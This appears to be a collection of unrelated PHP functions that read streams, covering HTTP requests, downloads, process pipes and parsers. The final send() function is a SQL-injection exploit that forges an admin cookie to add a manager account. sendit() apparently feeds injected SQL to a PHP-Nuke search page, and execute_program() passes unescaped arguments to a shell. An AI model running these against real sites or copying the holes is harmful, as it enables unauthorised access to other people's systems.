/** * Submits an HTTP POST to a reCAPTCHA server * @param string $host * @param string $path * @param array $data * @param int port * @return array response */ function _recaptcha_http_post($host, $path, $data, $port = 80) { $req = _recaptcha_qsencode($data); $proxy_host = "proxy.iiit.ac.in"; $proxy_port = "8080"; $http_request = "POST http://{$host}{$path} HTTP/1.0\r\n"; $http_request .= "Host: {$host}\r\n"; $http_request .= "Content-Type: application/x-www-form-urlencoded;\r\n"; $http_request .= "Content-Length: " . strlen($req) . "\r\n"; $http_request .= "User-Agent: reCAPTCHA/PHP\r\n"; $http_request .= "\r\n"; $http_request .= $req; $response = ''; if (false == ($fs = @fsockopen($proxy_host, $proxy_port, $errno, $errstr, 10))) { die('Could not open socket aah'); } fwrite($fs, $http_request); while (!feof($fs)) { $response .= fgets($fs, 1160); } // One TCP-IP packet fclose($fs); $response = explode("\r\n\r\n", $response, 2); return $response; }
/** * Constructor. * * @param Horde_Vcs_Base $rep A repository object. * @param string $dn Path to the directory. * @param array $opts Any additional options: * * @throws Horde_Vcs_Exception */ public function __construct(Horde_Vcs_Base $rep, $dn, $opts = array()) { parent::__construct($rep, $dn, $opts); $cmd = $rep->getCommand() . ' ls ' . escapeshellarg($rep->sourceroot . $this->_dirName); $dir = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $pipes); if (!$dir) { throw new Horde_Vcs_Exception('Failed to execute svn ls: ' . $cmd); } if ($error = stream_get_contents($pipes[2])) { proc_close($dir); throw new Horde_Vcs_Exception($error); } /* Create two arrays - one of all the files, and the other of all the * dirs. */ $errors = array(); while (!feof($pipes[1])) { $line = chop(fgets($pipes[1], 1024)); if (!strlen($line)) { continue; } if (substr($line, 0, 4) == 'svn:') { $errors[] = $line; } elseif (substr($line, -1) == '/') { $this->_dirs[] = substr($line, 0, -1); } else { $this->_files[] = $rep->getFile($this->_dirName . '/' . $line); } } proc_close($dir); }
public function compress($source, $type) { $cmd = sprintf('java -jar %s --type %s --charset UTF-8 --line-break 1000', escapeshellarg($this->yuiPath), $type); $process = proc_open($cmd, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")), $pipes); fwrite($pipes[0], $source); fclose($pipes[0]); $output = array("stdout" => "", "stderr" => ""); $readSockets = array("stdout" => $pipes[1], "stderr" => $pipes[2]); $empty = array(); while (false !== stream_select($readSockets, $empty, $empty, 1)) { foreach ($readSockets as $stream) { $output[$stream == $pipes[1] ? "stdout" : "stderr"] .= stream_get_contents($stream); } $readSockets = array("stdout" => $pipes[1], "stderr" => $pipes[2]); $eof = true; foreach ($readSockets as $stream) { $eof &= feof($stream); } if ($eof) { break; } } $compressed = $output['stdout']; $errors = $output['stderr']; $this->errors = "" !== $errors; if ($this->errors) { $compressed = ""; $this->errors = sprintf("alert('compression errors, check your source and console for details'); console.error(%s); ", json_encode($errors)); } proc_close($process); return $compressed; }
protected function downFile($path, $file_name) { header("Content-type:text/html;charset=utf-8"); // echo $path,$file_name; //中文兼容 $file_name = iconv("utf-8", "gb2312", $file_name); //获取网站根目录,这里可以换成你的下载目录 $file_sub_path = $path; $file_path = $file_sub_path . $file_name; //判断文件是否存在 if (!file_exists($file_path)) { echo '文件不存在'; return; } $fp = fopen($file_path, "r"); $file_size = filesize($file_path); //下载文件所需的header申明 Header("Content-type: application/octet-stream"); Header("Accept-Ranges: bytes"); Header("Accept-Length:" . $file_size); Header("Content-Disposition: attachment; filename=" . $file_name); $buffer = 1024; $file_count = 0; //返回数据到浏览器 while (!feof($fp) && $file_count < $file_size) { $file_con = fread($fp, $buffer); $file_count += $buffer; echo $file_con; } fclose($fp); }
function sendMemcacheCommand($server, $port, $command) { $s = @fsockopen($server, $port); if (!$s) { die("Cant connect to:" . $server . ':' . $port); } fwrite($s, $command . "\r\n"); $buf = ''; while (!feof($s)) { $buf .= fgets($s, 256); if (strpos($buf, "END\r\n") !== false) { // stat says end break; } if (strpos($buf, "DELETED\r\n") !== false || strpos($buf, "NOT_FOUND\r\n") !== false) { // delete says these break; } if (strpos($buf, "OK\r\n") !== false) { // flush_all says ok break; } } fclose($s); return parseMemcacheResults($buf); }
function jyxo_bot($q = "", $d = "mm", $ereg = ".", $notereg = "", $cnt = 10000000000000, $page = 1, $pmax = 2, $o = "nocls") { $i = 0; $results = ""; $results[$i] = ""; //$q = str_replace(" ", "+", $q); $q = urlencode($q); for (; $page <= $pmax; $page++) { $request = "http://jyxo.cz/s?q={$q}&d={$d}&o={$o}&cnt={$cnt}&page={$page}"; $fp = fopen($request, "r") or die(" !!! Cannot connect !!!"); while (!feof($fp)) { $line = fgets($fp); if (eregi("<div class='r'>", $line) && ereg(" class=ri", $line)) { $line = explode("<!--m--><div class='r'><A HREF=\"", $line); $line = $line[1]; $line = explode("\" class=ri", $line); $line = trim($line[0]); $line = urldecode($line); if (@eregi($ereg, $line) && !@eregi($notereg, $line) && !in_array($line, $results)) { echo "{$line}\n"; //Output //echo("$i:$line\n"); //Indexed Output //echo("<a href=\"$line\">$line</a><br />\n"); //XHTML Output $results[$i] = $line; $i++; } } } fclose($fp); } echo "\nTotal: {$i}\n"; //Sumary Output return $results; }
function test_instam($key) { // returns array, or FALSE // snap(basename(__FILE__) . __LINE__, $key_val); // http://www.instamapper.com/api?action=getPositions&key=4899336036773934943 $url = "http://www.instamapper.com/api?action=getPositions&key={$key}"; $data = ""; if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); } else { // not CURL if ($fp = @fopen($url, "r")) { while (!feof($fp) && strlen($data) < 9000) { $data .= fgets($fp, 128); } fclose($fp); } else { // print "-error 1"; // @fopen fails return FALSE; } } /* InstaMapper API v1.00 1263013328977,bold,1236239763,34.07413,-118.34940,25.0,0.0,335 1088203381874,CABOLD,1236255869,34.07701,-118.35262,27.0,0.4,72 */ // dump($data); $ary_data = explode("\n", $data); return $ary_data; }
function sendit($param) { $prefix = $_POST['prefix']; $data = $_POST['sql_text']; $host = $_POST['hostname']; $page = isset($_POST['dir']) ? '/' . $_POST['dir'] : ''; $page .= '/modules.php?name=Search'; $method = $_POST['method']; $ref_text = $_POST['ref_text']; $user_agent = $_POST['user_agent']; $result = ''; $sock = fsockopen($host, 80, $errno, $errstr, 50); if (!$sock) { die("{$errstr} ({$errno})\n"); } fputs($sock, "{$method} /{$page} HTTP/1.0\r\n"); fputs($sock, "Host: {$host}" . "\r\n"); fputs($sock, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($sock, "Content-length: " . strlen($data) . "\r\n"); fputs($sock, "Referer: {$ref_text}" . "\r\n"); fputs($sock, "User-Agent: {$user_agent}" . "\r\n"); fputs($sock, "Accept: */*\r\n"); fputs($sock, "\r\n"); fputs($sock, "{$data}\r\n"); fputs($sock, "\r\n"); while (!feof($sock)) { $result .= fgets($sock, 8192); } fclose($sock); return $result; }
protected function execute(InputInterface $input, OutputInterface $output) { $filename = $input->getArgument('filename'); if (!$filename) { if (0 !== ftell(STDIN)) { throw new \RuntimeException('Please provide a filename or pipe file content to STDIN.'); } $content = ''; while (!feof(STDIN)) { $content .= fread(STDIN, 1024); } return $this->display($input, $output, array($this->validate($content))); } if (0 !== strpos($filename, '@') && !is_readable($filename)) { throw new \RuntimeException(sprintf('File or directory "%s" is not readable', $filename)); } $files = array(); if (is_file($filename)) { $files = array($filename); } elseif (is_dir($filename)) { $files = Finder::create()->files()->in($filename)->name('*.yml'); } else { $dir = $this->getApplication()->getKernel()->locateResource($filename); $files = Finder::create()->files()->in($dir)->name('*.yml'); } $filesInfo = array(); foreach ($files as $file) { $filesInfo[] = $this->validate(file_get_contents($file), $file); } return $this->display($input, $output, $filesInfo); }
function Merge($newtext,$oldtext,$pagetext) { global $WorkDir,$SysMergeCmd, $SysMergePassthru; SDV($SysMergeCmd,"/usr/bin/diff3 -L '' -L '' -L '' -m -E"); if (substr($newtext,-1,1)!="\n") $newtext.="\n"; if (substr($oldtext,-1,1)!="\n") $oldtext.="\n"; if (substr($pagetext,-1,1)!="\n") $pagetext.="\n"; $tempnew = tempnam($WorkDir,"new"); $tempold = tempnam($WorkDir,"old"); $temppag = tempnam($WorkDir,"page"); if ($newfp=fopen($tempnew,'w')) { fputs($newfp,$newtext); fclose($newfp); } if ($oldfp=fopen($tempold,'w')) { fputs($oldfp,$oldtext); fclose($oldfp); } if ($pagfp=fopen($temppag,'w')) { fputs($pagfp,$pagetext); fclose($pagfp); } $mergetext = ''; if (IsEnabled($SysMergePassthru, 0)) { ob_start(); passthru("$SysMergeCmd $tempnew $tempold $temppag"); $mergetext = ob_get_clean(); } else { $merge_handle = popen("$SysMergeCmd $tempnew $tempold $temppag",'r'); if ($merge_handle) { while (!feof($merge_handle)) $mergetext .= fread($merge_handle,4096); pclose($merge_handle); } } @unlink($tempnew); @unlink($tempold); @unlink($temppag); return $mergetext; }
function PostRequest($url, $referer, $_data, $addheader = null) { $data = null; while (list($n, $v) = each($_data)) { $data .= '&' . $n . '=' . rawurlencode($v); } $data = substr($data, 1); $url = parse_url($url); if ($url['scheme'] != 'http') { die("Only HTTP-Request are supported"); } $host = $url['host']; $path = $url['path']; $fp = fsockopen($host, 80); fputs($fp, "POST {$path} HTTP/1.1\r\n"); fputs($fp, "Host: {$host}\r\n"); fputs($fp, "Referer: {$referer}\r\n"); fputs($fp, "User-Agent: BotTool (http://testhh.pytalhost.com)\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: " . strlen($data) . "\r\n"); if ($addheader != '') { fputs($fp, $addheader); } fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data); $result = null; while (!feof($fp)) { $result .= fgets($fp, 128); } fclose($fp); $result = explode("\r\n\r\n", $result, 2); $header = isset($result[0]) ? $result[0] : ''; $content = isset($result[1]) ? $result[1] : ''; return array($header, $content); }
public function donateAction() { $this->setAccess('frontend/dashboard/access'); // collect some data $data = []; exec('git-summary', $gitSummary); exec('git log -1 --format=%cd', $gitLastCommit); $key = 'git-time-extractor-file'; $timeStatsFilePath = ROOT_PATH . '/../data/git/stats.csv'; $this->getCache()->getItem($key, $success); if (!$success || !file_exists($timeStatsFilePath)) { exec('git_time_extractor > ' . $timeStatsFilePath); $this->getCache()->setItem($key, 'true'); } if (isset($gitSummary[2]) && isset($gitSummary[4]) && isset($gitSummary[5])) { // summary $data['project_age'] = trim(str_replace('repo age : ', '', $gitSummary[2])); $data['total_commits*'] = trim(str_replace('commits : ', '', $gitSummary[4])); $data['total_project_files'] = trim(str_replace('files : ', '', $gitSummary[5])); } else { $data['project_age'] = ''; $data['total_commits*'] = ''; $data['total_project_files'] = ''; } // changelog $data['last_commit'] = isset($gitLastCommit[0]) ? $gitLastCommit[0] : ''; $stats = fopen($timeStatsFilePath, 'r'); $x = 0; $changelog = []; $totalTime = 0; while (!feof($stats)) { $line = fgetcsv($stats, 1024, ',', '"'); if ($x++ == 0 || count($line) <= 1) { continue; } $changes = explode('---', $line[8]); unset($changes[0]); $changelog[] = ['date' => $line[0], 'changes' => $changes]; $totalTime += $line[3]; } $userRepo = $this->getEntityManager()->getRepository('Auth\\Entity\\Benutzer'); $squadRepo = $this->getEntityManager()->getRepository('Frontend\\Squads\\Entity\\Squad'); $memberRepo = $this->getEntityManager()->getRepository('Frontend\\Squads\\Entity\\Member'); // total user $data['registered_users'] = $userRepo->createQueryBuilder('c')->select('count(c.id)')->getQuery()->getSingleScalarResult(); // total squads $data['total_squads'] = $squadRepo->createQueryBuilder('c')->select('count(c.id)')->getQuery()->getSingleScalarResult(); // total squads $data['total_squad_members'] = $memberRepo->createQueryBuilder('c')->select('count(c.squad)')->getQuery()->getSingleScalarResult(); // total images $data['total_squad_logos'] = $squadRepo->createQueryBuilder('c')->select('count(c.logo)')->where('c.logo IS NOT NULL')->andWhere("c.logo != ''")->getQuery()->getSingleScalarResult(); // total image file size $data['total_squad_logos_size'] = $this->directoryFileSize(ROOT_PATH . '/uploads/logos/'); $viewModel = new ViewModel(); $viewModel->setTemplate('/dashboard/donate.phtml'); $viewModel->setVariable('data', $data); $viewModel->setVariable('changelog', array_reverse($changelog)); $viewModel->setVariable('total_time', $totalTime); return $viewModel; }
public function getfiles() { //检查文件是否存在 if (file_exists($this->_filepath)) { //打开文件 $file = fopen($this->_filepath, "r"); //返回的文件类型 Header("Content-type: application/octet-stream"); //按照字节大小返回 Header("Accept-Ranges: bytes"); //返回文件的大小 Header("Accept-Length: " . filesize($this->_filepath)); //这里对客户端的弹出对话框,对应的文件名 Header("Content-Disposition: attachment; filename=" . $this->_filename); //修改之前,一次性将数据传输给客户端 echo fread($file, filesize($this->_filepath)); //修改之后,一次只传输1024个字节的数据给客户端 //向客户端回送数据 $buffer = 1024; // //判断文件是否读完 while (!feof($file)) { //将文件读入内存 $file_data = fread($file, $buffer); //每次向客户端回送1024个字节的数据 echo $file_data; } fclose($file); } else { echo "<script>alert('对不起,您要下载的文件不存在');</script>"; } }
function find_xmpp($fp, $tag, $value = null, &$ret = null) { static $val = null, $index = null; do { if ($val === null && $index === null) { list($val, $index) = recv_xml($fp); if ($val === null || $index === null) { return false; } } foreach ($index as $tag_key => $tag_array) { if ($tag_key === $tag) { if ($value === null) { if (isset($val[$tag_array[0]]['value'])) { $ret = $val[$tag_array[0]]['value']; } return true; } foreach ($tag_array as $i => $pos) { if ($val[$pos]['tag'] === $tag && isset($val[$pos]['value']) && $val[$pos]['value'] === $value) { $ret = $val[$pos]['value']; return true; } } } } $val = $index = null; } while (!feof($fp)); return false; }
public function read($fp, &$limit = PHP_INT_MAX) { $fp = ProtobufIO::toStream($fp, $limit); while (!feof($fp) && $limit > 0) { $tag = Protobuf::read_varint($fp, $limit); if ($tag === false) { break; } $wire = $tag & 0x7; $field = $tag >> 3; switch ($field) { case 1: // optional string hash = 1 if ($wire !== 2) { throw new \Exception("Incorrect wire format for field {$field}, expected: 2 got: {$wire}"); } $len = Protobuf::read_varint($fp, $limit); if ($len === false) { throw new \Exception('Protobuf::read_varint returned false'); } $tmp = Protobuf::read_bytes($fp, $len, $limit); if ($tmp === false) { throw new \Exception("read_bytes({$len}) returned false"); } $this->hash = $tmp; break; default: $limit -= Protobuf::skip_field($fp, $wire); } } }
public static function seekPKHeader($handle) { $pkHeader = false; $curr = fgetc($handle); do { $prev = $curr; $curr = fgetc($handle); $pk = $prev == "P" && $curr == "K"; if ($pk) { $b1 = fgetc($handle); $b2 = fgetc($handle); if ($b1 == "" && $b2 == "") { $pkHeader = self::ZIP_CENTRAL_FILE_HEADER; } else { if ($b1 == "" && $b2 == "") { $pkHeader = self::ZIP_LOCAL_FILE_HEADER; } else { if ($b1 == "" && $b2 == "") { $pkHeader = self::ZIP_END_OF_CENTRAL_DIRECTORY; } else { if ($b1 == "" && $b2 == "") { $pkHeader = self::ZIP_LOCAL_DATA_DESCRIPTOR; } else { fseek($handle, -2, SEEK_CUR); $pk = false; } } } } } } while (!$pk && !feof($handle)); fseek($handle, -4, SEEK_CUR); return $pkHeader; }
public function signature_split($orgfile, $input) { $info = unpack('n', fread($input, 2)); $blocksize = $info[1]; $this->info['transferid'] = mt_rand(); $count = 0; $needed = array(); $cache = $this->getCache(); $prefix = $this->getPrefix(); while (!feof($orgfile)) { $new_md5 = fread($input, 16); if (feof($input)) { break; } $data = fread($orgfile, $blocksize); $org_md5 = md5($data, true); if ($org_md5 == $new_md5) { $cache->set($prefix . $count, $data); } else { $needed[] = $count; } $count++; } return array('transferid' => $this->info['transferid'], 'needed' => $needed, 'count' => $count); }
public function eof() { if ($this->resource) { return feof($this->resource); } return true; }
function execute_program($program, $args = '') { $buffer = ''; /* $program = find_program($program); print "$program $args<hr>"; if (!$program) { return; } if ($args) { $args_list = split(' ', $args); for ($i = 0; $i < count($args_list); $i++) { if ($args_list[$i] == '|') { $cmd = $args_list[$i+1]; $new_cmd = find_program($cmd); $args = ereg_replace("\| $cmd", "| $new_cmd", $args); } } } */ if ($fp = popen("/bin/df {$args}", 'r')) { while (!feof($fp)) { $buffer .= fgets($fp, 4096); } return trim($buffer); } }
/** * Purge URL coming from stdin */ private function doPurge() { $stdin = $this->getStdin(); $urls = array(); while (!feof($stdin)) { $page = trim(fgets($stdin)); if (preg_match('%^https?://%', $page)) { $urls[] = $page; } elseif ($page !== '') { $title = Title::newFromText($page); if ($title) { $url = $title->getInternalURL(); $this->output("{$url}\n"); $urls[] = $url; if ($this->getOption('purge')) { $title->invalidateCache(); } } else { $this->output("(Invalid title '{$page}')\n"); } } } $this->output("Purging " . count($urls) . " urls\n"); $this->sendPurgeRequest($urls); }
function httpGet($host, $base_fd) { global $index; $fd = stream_socket_client("{$host}", $errno, $errstr, 3, STREAM_CLIENT_ASYNC_CONNECT | STREAM_CLIENT_CONNECT); $index[$fd] = 0; $event_fd = event_new(); event_set($event_fd, $fd, EV_WRITE | EV_PERSIST, function ($fd, $events, $arg) use($host) { global $times, $limit, $index; if (!$index[$fd]) { $index[$fd] = 1; $out = "GET / HTTP/1.1\r\n"; $out .= "Host: {$host}\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fd, $out); } else { $str = fread($fd, 4096); echo $str, PHP_EOL; if (feof($fd)) { fclose($fd); $times++; echo "done\n"; if ($times == $limit - 1) { event_base_loopexit($arg[1]); } } } }, array($event_fd, $base_fd)); event_base_set($event_fd, $base_fd); event_add($event_fd); }
public static function processemail($emailsrc, $pdfout, $coverfile = '') { $combfilelist = array(); # Process the email $emailparts = Mail_mimeDecode::decode(array('include_bodies' => true, 'decode_bodies' => true, 'decode_headers' => true, 'input' => file_get_contents($emailsrc), 'crlf' => "\r\n")); # Process the cover if it exists if ($coverfile !== '') { $combfilelist[] = self::processpart(file_get_contents($coverfile), mime_content_type($coverfile)); } # Process the parts $combfilelist = array_merge($combfilelist, self::processparts($emailparts)); # Create an intermediate file to build the pdf $tmppdffilename = sys_get_temp_dir() . '/e2p-' . (string) abs((int) (microtime(true) * 100000)) . '.pdf'; # Build the command to combine all of the intermediate files into one $conbcom = str_replace(array_merge(array('INTFILE', 'COMBLIST'), array_keys(self::$driver_paths)), array_merge(array($tmppdffilename, implode(' ', $combfilelist)), array_values(self::$driver_paths)), self::$mime_drivers['gs']); exec($conbcom); # Remove the intermediate files foreach ($combfilelist as $combfilename) { unlink($combfilename); } # Write the intermediate file to the final destination $intfileres = fopen($tmppdffilename, 'rb'); $outfileres = fopen($pdfout, 'ab'); while (!feof($intfileres)) { fwrite($outfileres, fread($intfileres, 8192)); } fclose($intfileres); fclose($outfileres); # Remove the intermediate file unlink($tmppdffilename); }
/** * 返回通知结果 * * @author Garbin * @param array $order_info * @param bool $strict * @return array */ function verify_notify($order_info, $strict = false) { if (empty($order_info)) { $this->_error('order_info_empty'); return false; } $merchant_id = $this->_config['paypal_account']; $req = 'cmd=_notify-validate'; foreach ($_POST as $key => $value) { $value = urlencode(stripslashes($value)); $req .= "&{$key}={$value}"; } $header = "POST /cgi-bin/webscr HTTP/1.0\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . strlen($req) . "\r\n\r\n"; $fp = fsockopen('www.sandbox.paypal.com', 80, $errno, $errstr, 30); $item_name = $_POST['item_name']; $item_number = $_POST['item_number']; $payment_status = $_POST['payment_status']; $payment_amount = $_POST['mc_gross']; $payment_currency = $_POST['mc_currency']; $txn_id = $_POST['txn_id']; $receiver_email = $_POST['receiver_email']; $payer_email = $_POST['payer_email']; $order_sn = $_POST['invoice']; $memo = empty($_POST['memo']) ? '' : $_POST['memo']; if (!$fp) { fclose($fp); return false; } else { fputs($fp, $header . $req); while (!feof($fp)) { $res = fgets($fp, 1024); if (strcmp($res, 'VERIFIED') == 0) { if ($payment_status != 'Completed' && $payment_status != 'Pending') { fclose($fp); return false; } if ($receiver_email != $merchant_id) { fclose($fp); return false; } if ($order_info['order_amount'] != $payment_amount) { fclose($fp); $this->_error('money_inequalit'); return false; } if ($this->_config['paypal_currency'] != $payment_currency) { fclose($fp); return false; } fclose($fp); return array('target' => ORDER_ACCEPTED); } elseif (strcmp($res, 'INVALID') == 0) { fclose($fp); return false; } } } }
function http_send($_url, $_body) { $errno = 0; $errstr = ''; $timeout = 10; $fp = fsockopen(_IP_, _PORT_, $errno, $errstr, $timeout); if (!$fp) { return FALSE; } $_head = "POST /" . $_url . " HTTP/1.1\r\n"; $_head .= "Host: " . _IP_ . ":" . _PORT_ . "\r\n"; $_head .= "Content-Type: Text/plain\r\n"; if (!$_body) { $body_len = 0; } else { $body_len = strlen($_body); } $send_pkg = $_head . "Content-Length:" . $body_len . "\r\n\r\n" . $_body; ilog(iLOG_INFO, " -----> http_send url: " . $_url); ilog(iLOG_INFO, " -----> http_send body: " . $_body); if (fputs($fp, $send_pkg) === FALSE) { return FALSE; } //设置3s超时 stream_set_timeout($fp, 3); while (!feof($fp)) { ilog(iLOG_INFO, " -----> rsp: " . fgets($fp, 128)); } if ($fp) { fclose($fp); } return TRUE; }
function downloadToString() { $crlf = "\r\n"; // generate request $req = 'GET ' . $this->_uri . ' HTTP/1.0' . $crlf . 'Host: ' . $this->_host . $crlf . $crlf; // fetch $this->_fp = fsockopen(($this->_protocol == 'https' ? 'ssl://' : '') . $this->_host, $this->_port); fwrite($this->_fp, $req); while (is_resource($this->_fp) && $this->_fp && !feof($this->_fp)) { $response .= fread($this->_fp, 1024); } fclose($this->_fp); // split header and body $pos = strpos($response, $crlf . $crlf); if ($pos === false) { return $response; } $header = substr($response, 0, $pos); $body = substr($response, $pos + 2 * strlen($crlf)); // parse headers $headers = array(); $lines = explode($crlf, $header); foreach ($lines as $line) { if (($pos = strpos($line, ':')) !== false) { $headers[strtolower(trim(substr($line, 0, $pos)))] = trim(substr($line, $pos + 1)); } } // redirection? if (isset($headers['location'])) { $http = new ilHttpRequest($headers['location']); return $http->DownloadToString($http); } else { return $body; } }
/** * url 为服务的url地址 * query 为请求串 */ private function sock_post($url, $query) { $data = ""; $info = parse_url($url); $fp = fsockopen($info["host"], 80, $errno, $errstr, 30); if (!$fp) { return $data; } $head = "POST " . $info['path'] . " HTTP/1.0\r\n"; $head .= "Host: " . $info['host'] . "\r\n"; $head .= "Referer: http://" . $info['host'] . $info['path'] . "\r\n"; $head .= "Content-type: application/x-www-form-urlencoded\r\n"; $head .= "Content-Length: " . strlen(trim($query)) . "\r\n"; $head .= "\r\n"; $head .= trim($query); $write = fputs($fp, $head); $header = ""; while ($str = trim(fgets($fp, 4096))) { $header .= $str; } while (!feof($fp)) { $data .= fgets($fp, 4096); } return $data; }
function send_request_via_fsockopen1($host, $path, $content) { $posturl = "ssl://" . $host; $header = "Host: {$host}\r\n"; $header .= "User-Agent: PHP Script\r\n"; $header .= "Content-Type: text/xml\r\n"; $header .= "Content-Length: " . strlen($content) . "\r\n"; $header .= "Connection: close\r\n\r\n"; $fp = fsockopen($posturl, 443, $errno, $errstr, 30); if (!$fp) { $response = false; } else { error_reporting(E_ERROR); fputs($fp, "POST {$path} HTTP/1.1\r\n"); fputs($fp, $header . $content); fwrite($fp, $out); $response = ""; while (!feof($fp)) { $response = $response . fgets($fp, 128); } fclose($fp); error_reporting(E_ALL ^ E_NOTICE); } return $response; }
public function dwld() { $this->min(); if (is_numeric($this->getParam("id"))) { $this->download->newDownload(); if ($this->download->getIsLocal()) { $url = OWEB_DIR_DATA . "/downloads/" . $this->download->getUrl(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($url) . '";'); readfile($url); } else { $url = OWEB_DIR_DATA . "/downloads/" . $this->download->getUrl(); header("Content-Disposition: attachment; filename=" . basename($url)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($url)); flush(); // this doesn't really matter. $fp = fopen($url, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); } } else { throw new \Model\downloads\exception\DownloadCantBeFind("No Download ID given"); } }
function execute($cmd, &$output, &$error, &$returnCode) { $descriptorspec = array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')); $process = proc_open($cmd, $descriptorspec, $pipes); if (!is_resource($process)) { throw new RuntimeException("Unable to execute the command. [{$cmd}]"); } stream_set_blocking($pipes[1], false); stream_set_blocking($pipes[2], false); $output = $error = ''; foreach ($pipes as $key => $pipe) { while (!feof($pipe)) { if (!($line = fread($pipe, 128))) { continue; } if (1 == $key) { $output .= $line; // stdout } else { $error .= $line; // stderr } } fclose($pipe); } $returnCode = proc_close($process); }
function send($cmd) { global $host, $path; $message = "POST " . $path . "admin/admin_manager.asp?action=add HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: http://{$host}{$path}\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: securitylab\r\n"; $message .= "X-Forwarded-For:\r\n"; $message .= "Host: {$host}\r\n"; $message .= "Content-Length: " . strlen($cmd) . "\r\n"; $message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; echo $message; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) { $resp .= fread($fp, 1024); } echo $resp; return $resp; }